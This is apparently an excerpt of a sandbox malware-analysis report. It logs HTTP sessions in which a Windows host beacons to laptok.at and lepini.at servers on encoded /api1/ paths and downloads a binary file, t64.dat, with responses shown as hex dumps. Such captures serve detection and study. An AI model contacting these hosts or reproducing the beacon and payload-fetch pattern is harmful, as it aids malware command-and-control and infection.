                                                                                Feb 16, 2021 00:58:14.418257952 CET3563INData Raw: 83 0a 12 5f ce d1 d8 c9 1e 45 85 3d 05 01 31 d0 2d f0 1f 5f 56 96 e5 68 f0 47 85 07 9c 96 ee 3b 02 9e 82 6e 72 e3 b9 09 9a bc 6e a9 a9 33 96 c1 2d ab bf ac c9 c0 3a f7 0d c3 fe 27 e5 cb 55 d7 03 1b be e6 97 32 aa 63 57 9d 01 a7 a6 c8 90 aa 82 18
                                                                                Data Ascii: _E=1-_VhG;nrn3-:'U2cWHp3xi4@Y k7`hgY"&K^q07/`~s3q36r6__{=(h2}#ybxT0rG4n;"<u`;c_:F}Cr


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.44978134.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 16, 2021 00:58:14.900562048 CET3842OUTGET /favicon.ico HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
                                                                                Feb 16, 2021 00:58:15.025079012 CET3843INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:14 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.44978834.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 16, 2021 00:58:17.225936890 CET4069OUTGET /api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha HTTP/1.1
                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                Accept-Language: en-US
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
                                                                                Feb 16, 2021 00:58:17.669728994 CET4247INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 37 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 94 35 b2 ad 00 00 43 17 44 81 5b f1 0b e0 e2 ee d2 e1 ee ce ea ff eb 33 93 49 ce 24 af 04 77 c5 49 30 a8 12 a5 a8 b6 a2 5f 8b 54 b2 76 d5 66 ff 0d 57 1e 19 f4 a9 6d 4f b3 8e 5d 45 3e 09 2d 0c e2 b5 e8 b3 78 a7 0e 77 9b 12 07 06 8a 34 67 0b 51 e1 e3 63 ff d2 ba 88 2a d0 67 de 7e 35 cb 0f 69 99 96 72 61 db 7b 64 dc e9 f2 d6 a6 75 f4 53 a0 da 04 4e 16 a0 fc 4e ed c7 26 8a 5a ea 13 9a 6e ed 08 0b 7c cc 3a 04 f3 0e 55 97 6e e6 ab 00 c3 c8 6a 3e 3d 02 cc c5 94 d7 1a 93 3d c4 4d 8c 9d e5 36 2c 6b 04 b0 a2 35 67 c4 32 d5 e1 dd e7 70 62 be a2 0e 18 bc 38 ba ab b1 7a 36 52 97 d5 24 07 50 19 12 89 13 47 0d 36 af 5b bb fa cd cb b8 0a f6 31 6f c5 40 c9 03 8d 2d 41 90 b6 41 4f ad da 6b 65 9e 25 e9 71 cd af da a4 99 20 88 95 3c 3c 66 1c 12 d8 9f 8e cd 93 47 d0 b6 47 a6 5b 04 6f 4d d2 8b 2f cf c7 e4 84 5d 76 cd cc af 49 1e d7 6c b8 90 2b 8d 5d a1 d9 c6 fa dd 05 61 75 4a 98 d3 fd 73 72 8d 75 74 4f fa 17 62 27 63 f7 72 0f 18 74 fd 12 89 50 ca 7f 95 5e cd b5 30 ed 73 02 4d ec 8d 0e fd 6a 8f 0f da 19 f4 c1 29 eb 63 52 47 f1 ce 75 99 1f a8 ab b7 5d e0 01 7b 63 e8 a3 2a 8a 29 e0 2c ab fb a8 d5 b7 a0 1b 15 fd a7 ad 41 18 48 22 e2 d4 38 f9 9c 35 fc 68 a4 a6 73 e4 17 a6 16 e5 90 0a 7c e9 12 c4 d4 42 af 20 53 e5 0d 82 c1 75 23 a0 da 29 78 00 6c 96 a6 b6 f0 b2 79 50 06 8b 8d 2e 02 32 5d 59 db de 2a 32 51 3b 0f f5 98 d5 90 e7 2c 7f 06 f2 ea 77 56 4b 3d 0a a4 93 d9 56 ad c5 34 a9 de 9d 38 55 c9 0a 16 a6 fe 75 f3 6e 90 f4 ec 0d 36 62 44 46 cb c3 58 ac 57 f0 99 73 4d da be 94 43 fe b3 08 9c 2e e9 a7 a1 d7 81 0c 6a ef e0 04 38 67 b6 ca 8b 92 ac e9 da 9e da 9b 01 31 84 4c e0 20 e9 ea c0 df 5e a6 72 73 1b a0 2f 9d 2e cc ce 52 45 79 86 4d b4 30 84 ce c2 4a ee a4 ba b5 15 ce f4 61 a3 d3 79 43 24 bf 0f 43 7c ff c0 cc 2b 95 da dc cb 22 a5 92 42 4d 22 3a 81 36 29 0b 65 c7 aa 04 c9 2a 2b b0 64 0f 11 06 cc ba 7e be df 28 6e 54 a5 32 6c 65 68 e7 f9 07 6e 08 80 ea 46 14 a1 19 01 c9 3c 88 40 2b b0 05 d6 aa 94 1b 6a a7 ab ce e4 84 d8 5c be ce df 6d 1c 47 d8 88 00 c1 81 61 93 7c dc 1d c0 25 b1 8a 12 5c 2b af c4 07 a2 d2 d9 6f 70 2d ff 42 85 e4 9f 43 10 83 a9 d9 91 44 72 12 00 65 f4 0f f9 5b c1 46 b7 42 8c 2c 85 17 d5 a5 c2 60 d0 68 fa 83 d4 c6 c5 a4 05 25 0a aa c0 bc 66 ae 9b d3 f8 8b 2e c1 d9 f3 88 fe cb 5e 25 25 e6 3b 24 51 9d e8 57 11 cc 97 43 ed 62 f3 e7 14 a5 ed 3a 78 b9 0b 64 e9 9a 69 a9 ac 80 4c fb d4 7a 6c 4d bf a6 fe a8 be 6d 94 af 0e 84 13 96 c0 1f 95 3f 35 51 33 8d bf 4e 40 d7 d6 a8 5a d1 a6 ab 93 ac af 5d ed 9c 3b 0a f3 1b f8 9e 05 c0 5a 81 8e 5f a3 ff 42 38 c4 15 8e f4 c5 f4 84 12 a3 0f ae 1c 79 5f 55 04 71 ab 16 86 04 b5 26 45 c1 1e f1 0c d3 6d 93 da 34 92 07 29 0f 7d f3 b1 f0 42 0c 74 23 e1 07 09 aa 17 e3 3a 76 23 0c 27 41 95 44 1b cc c0 6c b1 67 1c 49 a3 fd 27 48 25 64 b9 21 aa 4b a5 07 b1 fe ca 41 9c 84 f4 bd 6d 51 c8 04 17 f0 51 73 39 51 2e 39 77 0f 2b f9 78 55 85 fe 06 3a 57 c8 b2 aa 51 1a bf b1 b6 f5 9c 21 0b fe 10 47 5d 37 d1 ca a3 c0 65 27 b8 4c 75 4f d1 c8 ac f3 9c 92 f6 09 86 93 59 48 bc 93 36 32 ab 8a de 24 16 3a fa cb 81 c4 5f 96 b7 ed f2 18 89 8f d0 9a 35 54 d6 57 2c 56 60 5c 98 bf 0e 12 af d4 7d 88 2e 5b 63 f9 c6 20 c6 93
                                                                                Data Ascii: 76c5CD[3I$wI0_TvfWmO]E>-xw4gQc*g~5ira{duSNN&Zn|:Unj>==M6,k5g2pb8z6R$PG6[1o@-AAOke%q <<fGG[oM/]vIl+]auJsrutOb'crtP^0sMj)cRGu]{c*),AH"85hs|B Su#)xlyP.2]Y*2Q;,wVK=V48Uun6bDFXWsMC.j8g1L ^rs/.REyM0JayC$C|+"BM":6)e*+d~(nT2lehnF<@+j\mGa|%\+op-BCDre[FB,`h%f.^%%;$QWCb:xdiLzlMm?5Q3N@Z];Z_B8y_Uq&Em4)}Bt#:v#'ADlgI'H%d!KAmQQs9Q.9w+xU:WQ!G]7e'LuOYH62$:_5TW,V`\}.[c
                                                                                Feb 16, 2021 00:58:17.669783115 CET4248INData Raw: e3 c3 40 bf b9 61 2d 05 15 84 20 14 ed 60 e3 f9 0c c8 a7 1c ac 63 51 f6 46 c8 6a fa 4f 8d 28 bb cf 99 6c 9e 2f 09 cf c4 a1 07 76 73 4b f1 ad 46 da 73 bb bb 31 e9 e2 b3 5c 19 7c 62 1c c0 fd a2 b7 4f 63 20 d5 57 ab 6b 1a 92 3a 8a 20 74 8c 9f e8 94
                                                                                Data Ascii: @a- `cQFjO(l/vsKFs1\|bOc Wk: tdE*((l}-+RJ{;eGaOw)(QTrV=n)1*<JJgcmV$(T+",^%EniZBvm*6$^a5


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.44979834.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 16, 2021 00:58:56.246588945 CET8581OUTGET /jvassets/xI/t64.dat HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
                                                                                Host: c56.lepini.at
                                                                                Feb 16, 2021 00:58:56.371509075 CET8582INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:56 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 138820
                                                                                Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                Connection: close
                                                                                ETag: "5db6b84e-21e44"
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
                                                                                Feb 16, 2021 00:58:56.371536970 CET8583INData Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8
                                                                                Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8|ymf&ASxYE6*Vfy
                                                                                Feb 16, 2021 00:58:56.371567011 CET8585INData Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1
                                                                                Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
                                                                                Feb 16, 2021 00:58:56.371582985 CET8586INData Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23
                                                                                Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
                                                                                Feb 16, 2021 00:58:56.371596098 CET8587INData Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4
                                                                                Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
                                                                                Feb 16, 2021 00:58:56.371608973 CET8589INData Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63
                                                                                Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
                                                                                Feb 16, 2021 00:58:56.371625900 CET8590INData Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1
                                                                                Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
                                                                                Feb 16, 2021 00:58:56.371646881 CET8591INData Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77
                                                                                Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
                                                                                Feb 16, 2021 00:58:56.371671915 CET8593INData Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed
                                                                                Data Ascii: ^P_L1l`>up_`O`RC'2*%[Tj0#*@J|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
                                                                                Feb 16, 2021 00:58:56.371690035 CET8594INData Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59
                                                                                Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv|&g6wHLTk?N~d>,<AHkPyhv?R
                                                                                Feb 16, 2021 00:58:56.419929028 CET8596INData Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41
                                                                                Data Ascii: hG&|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.44980034.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 16, 2021 00:59:05.558873892 CET8800OUTGET /api1/_2F5TIxM/R_2B3lAdX7FSifvLwGRNf4T/Xn6jTZLuMx/wh5E4h_2FPyrBTqQP/YDN8egogNxbu/ymacPdIkir0/NKKNzqD2vuGYxD/EQ2iBv1vi_2FKgbC6jRvO/67ImFcDLm_2FOZDz/QiB35x1OBx9fyp0/LL2dXEqoTiSnjkl_2B/cqWZBDCtg/kw_2BqWxxyjtsXEtMuCO/OQivEAtVKK4aYWaKL3G/xgxPJ7qQNKlWaEOMoFWGiX/qJDWe3oU_2FIN/ksLvpLmR/pIAQEZhwMl9o8sI2Dx0z5d9/PBFpDZPttD/KT6P6hofH96qtO4zq/sMAC80l_2B/o HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
                                                                                Host: api3.lepini.at
                                                                                Feb 16, 2021 00:59:06.251410007 CET8803INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:59:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7192.168.2.44980134.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 16, 2021 00:59:06.736301899 CET8804OUTPOST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
                                                                                Content-Length: 2
                                                                                Host: api3.lepini.at
                                                                                Feb 16, 2021 00:59:06.736310005 CET8804OUTData Raw: 0d 0a
                                                                                Data Ascii:
                                                                                Feb 16, 2021 00:59:07.282991886 CET8805INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:59:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Data Raw: 37 35 0d 0a 60 ad a4 27 b0 ce 61 26 a1 58 39 2f 9e eb 43 22 6a 80 de 19 83 22 06 4c 6d f8 81 7a 7b 73 26 7a d9 cc 1c 6c 65 78 f9 ac 3c c6 eb 80 3f f4 d9 2f 07 ba d1 fc 2b c1 29 3d c1 75 94 c2 7b 1b 33 56 19 43 35 57 2b 94 1a bc 4e 5c 60 be 72 f7 f5 20 5e e4 a3 9c 36 ff 57 a2 71 7e 66 46 40 2a 3e c9 f2 4d bf 40 9e ed 97 6f b0 79 e9 69 00 de d2 ef 1f 4b aa 01 e4 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 75`'a&X9/C"j"Lmz{s&zlex<?/+)=u{3VC5W+N\`r ^6Wq~fF@*>M@oyiK0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.44980234.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 16, 2021 00:59:08.534192085 CET8806OUTGET /api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
